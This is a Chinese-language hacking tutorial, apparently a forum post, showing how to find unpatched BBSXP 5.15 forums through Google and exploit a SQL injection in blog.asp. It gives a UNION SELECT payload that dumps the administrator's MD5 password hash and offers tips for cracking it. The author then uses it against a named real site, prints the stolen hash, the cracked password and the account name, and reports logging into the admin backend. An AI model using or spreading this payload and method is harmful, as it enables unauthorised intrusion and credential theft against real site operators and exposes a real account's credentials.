首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞 漏洞主要出在BLOG.ASP 可以让直接构造数据库命令 blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 后台区长的md5密码就显示出来了。 前台密码也可以出来, 网上已经有相关动画,软件。 就利用这个漏洞,肯定有一批bbsxp的网站要倒下了 接下来就是讲工具了,准备好MD5密码破解器 关于md5的破解,比较好使的有md5cracker速度增强版。 1。先用8位或9位数字跑。很快。 2。如果不行,用小写字母跑。选择5-6位比较好。 3。再不行,说明密码可能使字母加数字,可以碰碰运气。可以配置一个精品自典,比如10G的, 跑上及几个小时。(你的机器配置必须很好) 4。再不行,建议放弃,太变态了。 前台ok...后台密码..(注:你必须知道管理员的帐号) 直接默认的配置就是直接拿下后台密码... 直接吧前台md5密码暴出来。 剩下的事就事破解md5了。 现在开始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样,如果有2个加密密码那就是代表1个是前台的一个是后台的,不多说了,看操作 按照上面工具的介绍先用数字把, 正在破===耐心等等 我接条信息,大家不介意把~ 出来了,密码是82246124,登入,,他的帐号是wzwu,密码82246124,登入成功,后台登入,密码82246124,登入成功,下面的因该知道把,我也就不多说了,以免遭到人家的痛骂。 bBsxp5.15最新漏洞的原始作者不清